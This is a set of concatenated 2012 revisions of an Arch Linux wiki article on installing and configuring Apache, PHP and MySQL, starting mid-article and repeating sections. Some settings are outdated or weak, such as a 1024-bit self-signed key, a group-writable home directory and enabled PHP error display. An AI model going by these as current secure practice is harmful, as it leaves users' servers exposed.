# Listen 80<br />
This is the port Apache will listen to. For Internet-access with router, you have to forward the port.<br />
<br />
If you setup Apache for local development you may want it to be only accessible from your computer. Then change this line to:<br />
# Listen 127.0.0.1:80<br />
<br />
This is the admin's email-address which can be found on e.g. error-pages:<br />
# ServerAdmin sample@sample.com<br />
<br />
This is the directory where you should put your web pages:<br />
# DocumentRoot "/srv/http"<br />
<br />
Change it, if you want to, but do not forget to also change the<br />
<Directory "/srv/http"><br />
to whatever you changed your DocumentRoot to, or you will likely get a 403 error (lack of privileges) when you try to access the new document root. Do not forget to change the Deny from all line, otherwise you will get 403 error too.<br />
<br />
# AllowOverride None<br />
This directive in {{ic|<Directory>}} sections causes apache to completely ignore .htaccess files. If you intend to use rewrite mod or other settings in .htaccess files, you can allow which directives declared in that file can override server configuration. For more info refer to http://httpd.apache.org/docs/current/mod/core.html#allowoverride<br />
<br />
{{Note|If you have issues with your configuration you can have apache check the configuration with:<br />
{{Ic|apachectl configtest}}}}<br />
<br />
===PHP===<br />
* Install the "php-apache" package from extra using pacman.<br />
<br />
* Add these lines in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
:Place this in the "LoadModule" list anywhere after {{Ic|LoadModule dir_module modules/mod_dir.so}}:<br />
LoadModule php5_module modules/libphp5.so<br />
<br />
:Place this at the end of the "Include" list:<br />
Include conf/extra/php5_module.conf<br />
<br />
:Make sure that the following line is uncommented in httpd.conf in the section/(after the line){{Ic|<IfModule mime_module>}}:<br />
TypesConfig conf/mime.types<br />
<br />
:Uncomment the following line in httpd.conf(optional):<br />
MIMEMagicFile conf/magic<br />
<br />
* Add this line in {{ic|/etc/httpd/conf/mime.types}}:<br />
application/x-httpd-php5 php php5<br />
<br />
{{Note|If you do not see {{ic|libphp5.so}} in the Apache modules directory ({{Ic|/etc/httpd/modules}}), you may have forgotten to install the ''php-apache'' package.}}<br />
<br />
* If your {{Ic|DocumentRoot}} is not {{Ic|/srv/http}}, add it to {{Ic|open_basedir}} in {{ic|/etc/php/php.ini}} as such:<br />
open_basedir=/srv/http/:/home/:/tmp/:/usr/share/pear/:/path/to/documentroot<br />
<br />
* [[systemd#Using_units|Restart ]]'''httpd'''.<br />
<br />
* Create the file test.php in your Apache DocumentRoot Directory(E.G. /srv/http/ or ~/public_html) and inside it put:<br />
<?php phpinfo(); ?><br />
<br />
* Remember to copy this file to {{Ic|~/public_html}} if you permitted such a configuration.<!-- Also, remember to make it executable ({{Ic|chmod o+x test.php}}).--><br />
<br />
* Test PHP: http://localhost/test.php or http://localhost/~myname/test.php<br />
<br />
:If the PHP instruction is not executed (you see : <html>...</html>), check that you have added "Includes" to the "Options" line for your root directory in {{ic|/etc/httpd/conf/httpd.conf}}. Moreover, check that TypesConfig conf/mime.types is uncommented in the <IfModule mime_module> section, you may also try adding the following to the <IfModule mime_module> in httpd.conf:<br />
AddHandler application/x-httpd-php .php<br />
<br />
====Advanced options====<br />
* Remember to add a file handler for .phtml if you need it in {{ic|/etc/httpd/conf/extra/php5_module.conf}}:<br />
DirectoryIndex index.php index.phtml index.html<br />
<br />
* If you want the libGD module, install php-gd package and uncomment in {{ic|/etc/php/php.ini}}:<br />
{{Note|php-gd requires libpng, libjpeg, and freetype2}}<br />
;extension=gd.so<br />
to<br />
extension=gd.so<br />
<br />
:Pay attention to which extension you uncomment, as this extension is sometimes mentioned in an explanatory comment before the actual line you want to uncomment.<br />
<br />
<br />
* If you want to display errors to debug your php code, change this line of {{ic|/etc/php/php.ini}}:<br />
display_errors=Off<br />
to<br />
display_errors=On<br />
<br />
* If you want the mcrypt module, install php-mcrypt package and uncomment in {{ic|/etc/php/php.ini}}:<br />
;extension=mcrypt.so<br />
:to<br />
extension=mcrypt.so<br />
{{Warning|1=If you get error like:<br />
{{bc|<br />
[XXX Debug] PHP Notice: in file /index.php on line 86: date(): It is not safe to rely on the system'XXXX<br />
[XXX Debug] PHP Notice: in file /index.php on line 86: getdate(): It is not safe to rely on the system's timezone settings.XXXX}}<br />
<br />
change this line of {{ic|/etc/php/php.ini}} <br />
;date.timezone = <br />
to <br />
{{bc|1=date.timezone = Europe/Berlin}}<br />
}}<br />
{{note| more infos about [http://php.net/manual/en/datetime.configuration.php#ini.date.timezone Time Zone in PHP] }}<br />
[[systemd#Using_units|Restart ]]'''httpd'''.<br />
<br />
==== Using php5 with apache2-mpm-worker and mod_fcgid ====<br />
<br />
Uncomment following in {{ic|/etc/conf.d/apache}}:<br />
HTTPD=/usr/sbin/httpd.worker<br />
Uncomment following in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-mpm.conf<br />
Install mod_fcgid and php-cgi packages:<br />
# pacman -S mod_fcgid php-cgi<br />
Create {{ic|/etc/httpd/conf/extra/php5_fcgid.conf}} with following content:<br />
{{bc|1=<br />
# Required modules: fcgid_module<br />
<br />
<IfModule fcgid_module><br />
AddHandler php-fcgid .php<br />
AddType application/x-httpd-php .php<br />
Action php-fcgid /fcgid-bin/php-fcgid-wrapper<br />
ScriptAlias /fcgid-bin/ /srv/http/fcgid-bin/<br />
SocketPath /var/run/httpd/fcgidsock<br />
SharememPath /var/run/httpd/fcgid_shm<br />
# If you don't allow bigger requests many applications may fail (such as WordPress login)<br />
FcgidMaxRequestLen 536870912<br />
PHP_Fix_Pathinfo_Enable 1<br />
# Path to php.ini – defaults to /etc/phpX/cgi<br />
DefaultInitEnv PHPRC=/etc/php/<br />
# Number of PHP childs that will be launched. Leave undefined to let PHP decide.<br />
#DefaultInitEnv PHP_FCGI_CHILDREN 3<br />
# Maximum requests before a process is stopped and a new one is launched<br />
#DefaultInitEnv PHP_FCGI_MAX_REQUESTS 5000<br />
<Location /fcgid-bin/><br />
SetHandler fcgid-script<br />
Options +ExecCGI<br />
</Location><br />
</IfModule><br />
}}<br />
<br />
Create needed directory and symlink for php wrapper:<br />
# mkdir /srv/http/fcgid-bin<br />
# ln -s /usr/bin/php-cgi /srv/http/fcgid-bin/php-fcgid-wrapper<br />
<br />
Edit {{ic|/etc/httpd/conf/httpd.conf:}}<br />
#LoadModule php5_module modules/libphp5.so<br />
LoadModule fcgid_module modules/mod_fcgid.so<br />
Include conf/extra/php5_fcgid.conf<br />
Make sure {{ic|/etc/php/php.ini}} has the directive enabled:<br />
cgi.fix_pathinfo=1<br />
and [[systemd#Using_units|restart]] '''httpd'''.<br />
<br />
{{Note|1=As of Apache 2.4 (available as [http://aur.archlinux.org/packages.php?ID=60719 AUR package]) you can now use [http://httpd.apache.org/docs/2.4/mod/mod_proxy_fcgi.html mod_proxy_fcgi] (part of the official distribution) with PHP-FPM (and the new event MPM). See [http://wiki.apache.org/httpd/PHP-FPM configuration example]}}<br />
<br />
===MySQL===<br />
* Configure MySQL as described in [[MySQL]].<br />
<br />
* Edit {{ic|/etc/php/php.ini}} (this is in {{ic|/usr/etc}} on older systems) to uncomment the following lines (''By removing {{Ic|;}}''):<br />
;extension=mysqli.so<br />
;extension=mysql.so<br />
<br />
* You can add minor privileged users for your web scripts by editing the tables found in the {{Ic|mysql}} database. You have to restart MySQL for changes to take effect. Do not forget to check the {{Ic|mysql.user}} table: {{Ic|select User,Password from mysql.user;}}. If there is a second entry for root and your hostname is left with no password set, everybody from your host probably could gain full access. Perhaps see next section for these jobs.<br />
<br />
* [[systemd#Using_units|Start]] mysqld.<br />
<br />
* You may also need to [[systemd#Using_units|restart]] httpd (Apache).<br />
<br />
* MySQL should now be running. Set the root password and test it by running:<br />
# mysqladmin -u root password ''password''<br />
# mysql -u root -p<br />
<br />
:Type ''exit'' to exit from the CLI MySQL client<br />
<br />
* To start MySQL (mysqld) at boot, see [[Daemons#Starting_on_boot|Daemons]].<br />
<br />
* You might also need to edit {{ic|/etc/mysql/my.cnf}} and comment out the {{Ic|skip-networking}} line as such:<br />
skip-networking<br />
to<br />
#skip-networking<br />
<br />
{{Tip|You may want to install [[PhpMyAdmin|phpmyadmin]], {{AUR|mysql-workbench}} or [[Adminer|adminer]] to work with your databases.}}<br />
<br />
==See also==<br />
* [[MySQL]] - Article for MySQL<br />
* [[PhpMyAdmin]] - Web frontend for MySQL typically found in LAMP environments<br />
* [[Adminer]] - A full-featured database management tool which is available for MySQL, PostgreSQL, SQLite, MS SQL and Oracle<br />
* [[Xampp]] - Self contained web-server that supports PHP, Perl, and MySQL<br />
* [[mod_perl]] - Apache + Perl<br />
<br />
==External links==<br />
* http://www.apache.org/<br />
* http://www.php.net/<br />
* http://www.mysql.com/<br />
* http://www.akadia.com/services/ssh_test_certificate.html<br />
* http://wiki.apache.org/httpd/CommonMisconfigurations</div>Wakehttps://wiki.archlinux.org/index.php?title=Apache_HTTP_Server&diff=234747Apache HTTP Server2012-11-10T21:08:02Z<p>Wake: /* PHP */ rm rc.d stuff</p>
<hr />
<div>[[Category:Web Server]]<br />
[[cs:LAMP]]<br />
[[de:LAMP Installation]]<br />
[[el:LAMP]]<br />
[[es:LAMP]]<br />
[[fr:Lamp]]<br />
[[it:LAMP]]<br />
[[pl:LAMP]]<br />
[[ru:LAMP]]<br />
[[sr:LAMP]]<br />
[[tr:LAMP]]<br />
[[zh-CN:LAMP]]<br />
[http://en.wikipedia.org/wiki/LAMP_%28software_bundle%29 LAMP] refers to a common combination of software used in many web servers: '''L'''inux, '''A'''pache, '''M'''ySQL, and '''P'''HP. This article describes how to set up the [http://httpd.apache.org Apache HTTP Server] on an Arch Linux system. It also tells you how to optionally install [[PHP]] and [[MySQL]] and integrate these in the Apache server.<br />
<br />
If you only need a web server for development and testing, [[Xampp]] might be a better and easier option.<br />
<br />
==Installation==<br />
# pacman -S apache php php-apache mysql<br />
<br />
This document assumes you will install Apache, PHP and MySQL together. If desired however, you may install Apache, PHP, and MySQL separately and simply refer to the relevant sections below.<br />
<br />
{{Note|New default user and group: Instead of group "nobody", apache now runs as user/group "http" by default. You might want to adjust your httpd.conf according to this change, though you may still run httpd as nobody.}}<br />
<br />
==Configuration==<br />
<br />
===Apache===<br />
For security reasons, as soon as Apache is started by the root user (directly or via startup scripts) it switches to the UID/GID specified in {{ic|/etc/httpd/conf/httpd.conf}}<br />
<br />
* Check for the existence of the http user by looking for ''http'' in the output of the following command:<br />
# grep http /etc/passwd<br />
<br />
* Create the system user http if it does not exist already:<br />
# useradd -d /srv/http -r -s /bin/false -U http<br />
:This creates the http user with home directory {{ic|/srv/http/}}, as a system account (-r), with a bogus shell (-s {{ic|/bin/false}}) and creates a group with the same name (-U).<br />
<br />
* Add this line to {{ic|/etc/hosts}} (If the file does not exist, create it.):<br />
127.0.0.1 localhost.localdomain localhost<br />
:If you want a different hostname, append it to the end:<br />
127.0.0.1 localhost.localdomain localhost myhostname<br />
<br />
* Make sure the hostname appears in /etc/hosts or apache will fail to start. Alternatively, you can<br />
edit {{ic|/etc/httpd/conf/httpd.conf}} and comment the following module:<br />
LoadModule unique_id_module modules/mod_unique_id.so<br />
<br />
* Customize your config. At least change {{ic|httpd.conf}} and {{ic|extra/httpd-default.conf}} to your liking. For security reasons, you might want to change '''ServerTokens Full''' to '''ServerTokens Prod''' and '''ServerSignature On''' to '''ServerSignature Off''' in {{ic|extra/httpd-default.conf}}.<br />
<br />
* Start the HTTP server (the deamon name is '''httpd'''. See [[Daemons#Starting_manually|Deamons]]).<br />
<br />
:Apache should now be running. Test by visiting http://localhost/ in a web browser. It should display a simple Apache test page. If you receive a 403 Error, comment out the following line in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* To start '''httpd''' automatically at boot, see [[Daemons#Starting_on_boot|Deamons]]<br />
<br />
====User dirs====<br />
* If you do not want user directories to be available on the web (e.g., {{ic|~/public_html}} on the machine is accessed as http://localhost/~user/ -Note that you can change what this points to in {{ic|/etc/httpd/conf/extra/httpd-userdir.conf}}), comment the following line in {{ic|/etc/httpd/conf/httpd.conf}} since they are activated by default:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* You must make sure that your home directory permissions are set properly so that Apache can get there. Your home directory and {{ic|~/public_html/}} must be executable for others ("rest of the world"). This seems to be enough:<br />
$ chmod o+x ~<br />
$ chmod o+x ~/public_html<br />
<br />
* More secure way to share your home folder with apache is to add '''http user''' in group that your home folder belongs. For example, if your home folder and other sub-folders in your home folder belong to group '''piter''', all you have to do is following:<br />
<br />
$ usermod -aG piter http<br />
<br />
* Of course, you have to give ''read'' and ''execute'' permissions on {{ic|~/}}, {{ic|~/public_html}}, and all other sub-folders in {{ic|~/public_html}} to the group members (group '''piter''' in our case). Do something like following ('''modify commands for your specific case'''):<br />
<br />
$ chmod g+xr-w /home/''yourusername''<br />
$ chmod -R g+xr-w /home/''yourusername''/public_html<br />
<br />
{{Note|This way you do not have to give access to your folder to every single user in order to give access to '''http user'''. Only '''http user''' and other potential users that are in '''piter''' group will have access to your home folder.}}<br />
<br />
and restart '''httpd'''.<br />
<br />
====SSL====<br />
Create self-signed certificate (you can change key size and days of validity)<br />
# cd /etc/httpd/conf<br />
# openssl genrsa -des3 -out server.key 1024<br />
# openssl req -new -key server.key -out server.csr<br />
# cp server.key server.key.org<br />
# openssl rsa -in server.key.org -out server.key<br />
# openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt<br />
In {{ic|/etc/httpd/conf/httpd.conf}} uncomment line<br />
Include conf/extra/httpd-ssl.conf<br />
and restart '''httpd'''.<br />
<br />
====Virtual Hosts====<br />
If you want to have more than one host, make sure you have<br />
{{bc|<br />
# Virtual hosts<br />
Include conf/extra/httpd-vhosts.conf<br />
}}<br />
in {{ic|/etc/httpd/conf/httpd.conf}}.<br />
<br />
In {{ic|/etc/httpd/conf/extra/httpd-vhosts.conf}} set your virtual hosts according the example, e.g.:<br />
{{bc|<br />
NameVirtualHost *:80<br />
<br />
#this first virtualhost enables: http://127.0.0.1, or: http://localhost, <br />
#to still go to /srv/http/*index.html(otherwise it will 404_error).<br />
#the reason for this: once you tell httpd.conf to include extra/httpd-vhosts.conf, <br />
#ALL vhosts are handled in httpd-vhosts.conf(including the default one),<br />
# E.G. the default virtualhost in httpd.conf is not used and must be included here, <br />
#otherwise, only domainname1.dom & domainname2.dom will be accessible<br />
#from your web browser and NOT http://127.0.0.1, or: http://localhost, etc.<br />
#<br />
<br />
<VirtualHost *:80><br />
DocumentRoot "/srv/http"<br />
ServerAdmin root@localhost<br />
ErrorLog "/var/log/httpd/127.0.0.1-error_log"<br />
CustomLog "/var/log/httpd/127.0.0.1-access_log" common<br />
<Directory /srv/http/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname1.dom<br />
DocumentRoot "/home/username/yoursites/domainname1.dom/www"<br />
ServerName domainname1.dom<br />
ServerAlias domainname1.dom<br />
<Directory /home/username/yoursites/domainname1.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
<br />
<VirtualHost *:80><br />
ServerAdmin your@domainname2.dom<br />
DocumentRoot "/home/username/yoursites/domainname2.dom/www"<br />
ServerName domainname2.dom<br />
ServerAlias domainname2.dom<br />
<Directory /home/username/yoursites/domainname2.dom/www/><br />
DirectoryIndex index.htm index.html<br />
AddHandler cgi-script .cgi .pl<br />
Options ExecCGI Indexes FollowSymLinks MultiViews +Includes<br />
AllowOverride None<br />
Order allow,deny<br />
allow from all<br />
</Directory><br />
</VirtualHost><br />
}}<br />
<br />
Add your virtual host names to your {{ic|/etc/hosts}} file (NOT necessary if bind is serving these domains already, but will not hurt):<br />
{{bc|127.0.0.1 domainname1.dom<br />
127.0.0.1 domainname2.dom}}<br />
<br />
and restart '''httpd'''.<br />
<br />
If you setup your virtual hosts to be in your user directory, sometimes it interferes with Apache's 'Userdir' settings. To avoid problems disable 'Userdir' by commenting it out:<br />
{{bc|<br />
# User home directories<br />
#Include conf/extra/httpd-userdir.conf}}<br />
<br />
As said above, ensure that you have the proper permissions:<br />
# chmod 0775 /home/yourusername/<br />
<br />
If you have a huge amount of virtual hosts you easily want to dis- and enable, it's recommended to create one config file per virtualhost and store them all in one folder, eg: {{ic|/etc/httpd/conf/vhosts}}.<br />
<br />
First create the folder:<br />
# mkdir /etc/httpd/conf/vhosts<br />
<br />
Then place the single config files in them:<br />
# nano /etc/httpd/conf/vhosts/domainname1.dom<br />
# nano /etc/httpd/conf/vhosts/domainname2.dom<br />
...<br />
<br />
In the last step, "Include" the single configs in your {{ic|/etc/httpd/conf/httpd.conf}}:<br />
{{bc|#Enabled Vhosts:<br />
Include conf/vhosts/domainname1.dom<br />
#Include conf/vhosts/domainname1.dom}}<br />
<br />
You can enable and disable single virtual hosts by commenting them out or uncommenting them.<br />
<br />
====Advanced Options====<br />
These options in {{ic|/etc/httpd/conf/httpd.conf}} might be interesting for you:<br />
<br />
# Listen 80<br />
This is the port Apache will listen to. For Internet-access with router, you have to forward the port.<br />
<br />
If you setup Apache for local development you may want it to be only accessible from your computer. Then change this line to:<br />
# Listen 127.0.0.1:80<br />
<br />
This is the admin's email-address which can be found on e.g. error-pages:<br />
# ServerAdmin sample@sample.com<br />
<br />
This is the directory where you should put your web pages:<br />
# DocumentRoot "/srv/http"<br />
<br />
Change it, if you want to, but do not forget to also change the<br />
<Directory "/srv/http"><br />
to whatever you changed your DocumentRoot to, or you will likely get a 403 error (lack of privileges) when you try to access the new document root. Do not forget to change the Deny from all line, otherwise you will get 403 error too.<br />
<br />
# AllowOverride None<br />
This directive in {{ic|<Directory>}} sections causes apache to completely ignore .htaccess files. If you intend to use rewrite mod or other settings in .htaccess files, you can allow which directives declared in that file can override server configuration. For more info refer to http://httpd.apache.org/docs/current/mod/core.html#allowoverride<br />
<br />
{{Note|If you have issues with your configuration you can have apache check the configuration with:<br />
{{Ic|apachectl configtest}}}}<br />
<br />
===PHP===<br />
* Install the "php-apache" package from extra using pacman.<br />
<br />
* Add these lines in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
:Place this in the "LoadModule" list anywhere after {{Ic|LoadModule dir_module modules/mod_dir.so}}:<br />
LoadModule php5_module modules/libphp5.so<br />
<br />
:Place this at the end of the "Include" list:<br />
Include conf/extra/php5_module.conf<br />
<br />
:Make sure that the following line is uncommented in httpd.conf in the section/(after the line){{Ic|<IfModule mime_module>}}:<br />
TypesConfig conf/mime.types<br />
<br />
:Uncomment the following line in httpd.conf(optional):<br />
MIMEMagicFile conf/magic<br />
<br />
* Add this line in {{ic|/etc/httpd/conf/mime.types}}:<br />
application/x-httpd-php5 php php5<br />
<br />
{{Note|If you do not see {{ic|libphp5.so}} in the Apache modules directory ({{Ic|/etc/httpd/modules}}), you may have forgotten to install the ''php-apache'' package.}}<br />
<br />
* If your {{Ic|DocumentRoot}} is not {{Ic|/srv/http}}, add it to {{Ic|open_basedir}} in {{ic|/etc/php/php.ini}} as such:<br />
open_basedir=/srv/http/:/home/:/tmp/:/usr/share/pear/:/path/to/documentroot<br />
<br />
* [[systemd#Using_units|Restart ]]'''httpd'''.<br />
<br />
* Create the file test.php in your Apache DocumentRoot Directory(E.G. /srv/http/ or ~/public_html) and inside it put:<br />
<?php phpinfo(); ?><br />
<br />
* Remember to copy this file to {{Ic|~/public_html}} if you permitted such a configuration.<!-- Also, remember to make it executable ({{Ic|chmod o+x test.php}}).--><br />
<br />
* Test PHP: http://localhost/test.php or http://localhost/~myname/test.php<br />
<br />
:If the PHP instruction is not executed (you see : <html>...</html>), check that you have added "Includes" to the "Options" line for your root directory in {{ic|/etc/httpd/conf/httpd.conf}}. Moreover, check that TypesConfig conf/mime.types is uncommented in the <IfModule mime_module> section, you may also try adding the following to the <IfModule mime_module> in httpd.conf:<br />
AddHandler application/x-httpd-php .php<br />
<br />
====Advanced options====<br />
* Remember to add a file handler for .phtml if you need it in {{ic|/etc/httpd/conf/extra/php5_module.conf}}:<br />
DirectoryIndex index.php index.phtml index.html<br />
<br />
* If you want the libGD module, install php-gd package and uncomment in {{ic|/etc/php/php.ini}}:<br />
{{Note|php-gd requires libpng, libjpeg, and freetype2}}<br />
;extension=gd.so<br />
to<br />
extension=gd.so<br />
<br />
:Pay attention to which extension you uncomment, as this extension is sometimes mentioned in an explanatory comment before the actual line you want to uncomment.<br />
<br />
<br />
* If you want to display errors to debug your php code, change this line of {{ic|/etc/php/php.ini}}:<br />
display_errors=Off<br />
to<br />
display_errors=On<br />
<br />
* If you want the mcrypt module, install php-mcrypt package and uncomment in {{ic|/etc/php/php.ini}}:<br />
;extension=mcrypt.so<br />
:to<br />
extension=mcrypt.so<br />
{{Warning|1=If you get error like:<br />
{{bc|<br />
[XXX Debug] PHP Notice: in file /index.php on line 86: date(): It is not safe to rely on the system'XXXX<br />
[XXX Debug] PHP Notice: in file /index.php on line 86: getdate(): It is not safe to rely on the system's timezone settings.XXXX}}<br />
<br />
change this line of {{ic|/etc/php/php.ini}} <br />
;date.timezone = <br />
to <br />
{{bc|1=date.timezone = Europe/Berlin}}<br />
}}<br />
{{note| more infos about [http://php.net/manual/en/datetime.configuration.php#ini.date.timezone Time Zone in PHP] }}<br />
[[systemd#Using_units|Restart ]]'''httpd'''.<br />
<br />
==== Using php5 with apache2-mpm-worker and mod_fcgid ====<br />
<br />
Uncomment following in {{ic|/etc/conf.d/apache}}:<br />
HTTPD=/usr/sbin/httpd.worker<br />
Uncomment following in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-mpm.conf<br />
Install mod_fcgid and php-cgi packages:<br />
# pacman -S mod_fcgid php-cgi<br />
Create {{ic|/etc/httpd/conf/extra/php5_fcgid.conf}} with following content:<br />
{{bc|1=<br />
# Required modules: fcgid_module<br />
<br />
<IfModule fcgid_module><br />
AddHandler php-fcgid .php<br />
AddType application/x-httpd-php .php<br />
Action php-fcgid /fcgid-bin/php-fcgid-wrapper<br />
ScriptAlias /fcgid-bin/ /srv/http/fcgid-bin/<br />
SocketPath /var/run/httpd/fcgidsock<br />
SharememPath /var/run/httpd/fcgid_shm<br />
# If you don't allow bigger requests many applications may fail (such as WordPress login)<br />
FcgidMaxRequestLen 536870912<br />
PHP_Fix_Pathinfo_Enable 1<br />
# Path to php.ini – defaults to /etc/phpX/cgi<br />
DefaultInitEnv PHPRC=/etc/php/<br />
# Number of PHP childs that will be launched. Leave undefined to let PHP decide.<br />
#DefaultInitEnv PHP_FCGI_CHILDREN 3<br />
# Maximum requests before a process is stopped and a new one is launched<br />
#DefaultInitEnv PHP_FCGI_MAX_REQUESTS 5000<br />
<Location /fcgid-bin/><br />
SetHandler fcgid-script<br />
Options +ExecCGI<br />
</Location><br />
</IfModule><br />
}}<br />
<br />
Create needed directory and symlink for php wrapper:<br />
# mkdir /srv/http/fcgid-bin<br />
# ln -s /usr/bin/php-cgi /srv/http/fcgid-bin/php-fcgid-wrapper<br />
<br />
Edit {{ic|/etc/httpd/conf/httpd.conf:}}<br />
#LoadModule php5_module modules/libphp5.so<br />
LoadModule fcgid_module modules/mod_fcgid.so<br />
Include conf/extra/php5_fcgid.conf<br />
Make sure {{ic|/etc/php/php.ini}} has the directive enabled:<br />
cgi.fix_pathinfo=1<br />
and [[systemd#Using_units|restart]] '''httpd'''.<br />
<br />
{{Note|1=As of Apache 2.4 (available as [http://aur.archlinux.org/packages.php?ID=60719 AUR package]) you can now use [http://httpd.apache.org/docs/2.4/mod/mod_proxy_fcgi.html mod_proxy_fcgi] (part of the official distribution) with PHP-FPM (and the new event MPM). See [http://wiki.apache.org/httpd/PHP-FPM configuration example]}}<br />
<br />
===MySQL===<br />
* Configure MySQL as described in [[MySQL]].<br />
<br />
* Edit {{ic|/etc/php/php.ini}} (this is in {{ic|/usr/etc}} on older systems) to uncomment the following lines (''By removing {{Ic|;}}''):<br />
;extension=mysqli.so<br />
;extension=mysql.so<br />
<br />
* You can add minor privileged users for your web scripts by editing the tables found in the {{Ic|mysql}} database. You have to restart MySQL for changes to take effect. Do not forget to check the {{Ic|mysql.user}} table: {{Ic|select User,Password from mysql.user;}}. If there is a second entry for root and your hostname is left with no password set, everybody from your host probably could gain full access. Perhaps see next section for these jobs.<br />
<br />
* Run in terminal:<br />
# rc.d start mysqld<br />
or, for systemd users<br />
# systemctl restart mysqld<br />
<br />
* You may also need to restart Apache. Run in terminal:<br />
# rc.d restart httpd<br />
or, for systemd users<br />
# systemctl restart httpd<br />
<br />
* MySQL should now be running. Set the root password and test it by running:<br />
# mysqladmin -u root password ''password''<br />
# mysql -u root -p<br />
<br />
:Type ''exit'' to exit from the CLI MySQL client<br />
<br />
* Edit {{ic|/etc/rc.conf}} (to start MySQL at boot):<br />
DAEMONS=(... '''mysqld''' ...)<br />
Or add this line to {{ic|rc.local}}:<br />
# rc.d start mysqld<br />
or, for systemd users<br />
# systemctl enable mysqld<br />
<br />
* You might also need to edit {{ic|/etc/mysql/my.cnf}} and comment out the {{Ic|skip-networking}} line as such:<br />
skip-networking<br />
to<br />
#skip-networking<br />
<br />
{{Tip|You may want to install [[PhpMyAdmin|phpmyadmin]], {{AUR|mysql-workbench}} or [[Adminer|adminer]] to work with your databases.}}<br />
<br />
==See also==<br />
* [[MySQL]] - Article for MySQL<br />
* [[PhpMyAdmin]] - Web frontend for MySQL typically found in LAMP environments<br />
* [[Adminer]] - A full-featured database management tool which is available for MySQL, PostgreSQL, SQLite, MS SQL and Oracle<br />
* [[Xampp]] - Self contained web-server that supports PHP, Perl, and MySQL<br />
* [[mod_perl]] - Apache + Perl<br />
<br />
==External links==<br />
* http://www.apache.org/<br />
* http://www.php.net/<br />
* http://www.mysql.com/<br />
* http://www.akadia.com/services/ssh_test_certificate.html<br />
* http://wiki.apache.org/httpd/CommonMisconfigurations</div>Wakehttps://wiki.archlinux.org/index.php?title=Apache_HTTP_Server&diff=234746Apache HTTP Server2012-11-10T20:56:06Z<p>Wake: /* Apache */ rm deamon start/restart details, ref Deamon page.</p>
<hr />
<div>[[Category:Web Server]]<br />
[[cs:LAMP]]<br />
[[de:LAMP Installation]]<br />
[[el:LAMP]]<br />
[[es:LAMP]]<br />
[[fr:Lamp]]<br />
[[it:LAMP]]<br />
[[pl:LAMP]]<br />
[[ru:LAMP]]<br />
[[sr:LAMP]]<br />
[[tr:LAMP]]<br />
[[zh-CN:LAMP]]<br />
[http://en.wikipedia.org/wiki/LAMP_%28software_bundle%29 LAMP] refers to a common combination of software used in many web servers: '''L'''inux, '''A'''pache, '''M'''ySQL, and '''P'''HP. This article describes how to set up the [http://httpd.apache.org Apache HTTP Server] on an Arch Linux system. It also tells you how to optionally install [[PHP]] and [[MySQL]] and integrate these in the Apache server.<br />
<br />
If you only need a web server for development and testing, [[Xampp]] might be a better and easier option.<br />
<br />
==Installation==<br />
# pacman -S apache php php-apache mysql<br />
<br />
This document assumes you will install Apache, PHP and MySQL together. If desired however, you may install Apache, PHP, and MySQL separately and simply refer to the relevant sections below.<br />
<br />
{{Note|New default user and group: Instead of group "nobody", apache now runs as user/group "http" by default. You might want to adjust your httpd.conf according to this change, though you may still run httpd as nobody.}}<br />
<br />
==Configuration==<br />
<br />
===Apache===<br />
For security reasons, as soon as Apache is started by the root user (directly or via startup scripts) it switches to the UID/GID specified in {{ic|/etc/httpd/conf/httpd.conf}}<br />
<br />
* Check for the existence of the http user by looking for ''http'' in the output of the following command:<br />
# grep http /etc/passwd<br />
<br />
* Create the system user http if it does not exist already:<br />
# useradd -d /srv/http -r -s /bin/false -U http<br />
:This creates the http user with home directory {{ic|/srv/http/}}, as a system account (-r), with a bogus shell (-s {{ic|/bin/false}}) and creates a group with the same name (-U).<br />
<br />
* Add this line to {{ic|/etc/hosts}} (If the file does not exist, create it.):<br />
127.0.0.1 localhost.localdomain localhost<br />
:If you want a different hostname, append it to the end:<br />
127.0.0.1 localhost.localdomain localhost myhostname<br />
<br />
* Make sure the hostname appears in /etc/hosts or apache will fail to start. Alternatively, you can<br />
edit {{ic|/etc/httpd/conf/httpd.conf}} and comment the following module:<br />
LoadModule unique_id_module modules/mod_unique_id.so<br />
<br />
* Customize your config. At least change {{ic|httpd.conf}} and {{ic|extra/httpd-default.conf}} to your liking. For security reasons, you might want to change '''ServerTokens Full''' to '''ServerTokens Prod''' and '''ServerSignature On''' to '''ServerSignature Off''' in {{ic|extra/httpd-default.conf}}.<br />
<br />
* Start the HTTP server (the deamon name is '''httpd'''. See [[Daemons#Starting_manually|Deamons]]).<br />
<br />
:Apache should now be running. Test by visiting http://localhost/ in a web browser. It should display a simple Apache test page. If you receive a 403 Error, comment out the following line in {{ic|/etc/httpd/conf/httpd.conf}}:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* To start '''httpd''' automatically at boot, see [[Daemons#Starting_on_boot|Deamons]]<br />
<br />
====User dirs====<br />
* If you do not want user directories to be available on the web (e.g., {{ic|~/public_html}} on the machine is accessed as http://localhost/~user/ -Note that you can change what this points to in {{ic|/etc/httpd/conf/extra/httpd-userdir.conf}}), comment the following line in {{ic|/etc/httpd/conf/httpd.conf}} since they are activated by default:<br />
Include conf/extra/httpd-userdir.conf<br />
<br />
* You must make sure that your home directory permissions are set properly so that Apache can get there. Your home directory and {{ic|~/public_html/}} must be executable for others ("rest of the world"). This seems to be enough:<br />
$ chmod o+x ~<br />
$ chmod o+x ~/public_html<br />
<br />
* More secure way to share your home folder with apache is to add '''http user''' in group that your home folder belongs. For example, if your home folder and other sub-folders in your home folder belong to group '''piter''', all you have to do is following:<br />
<br />
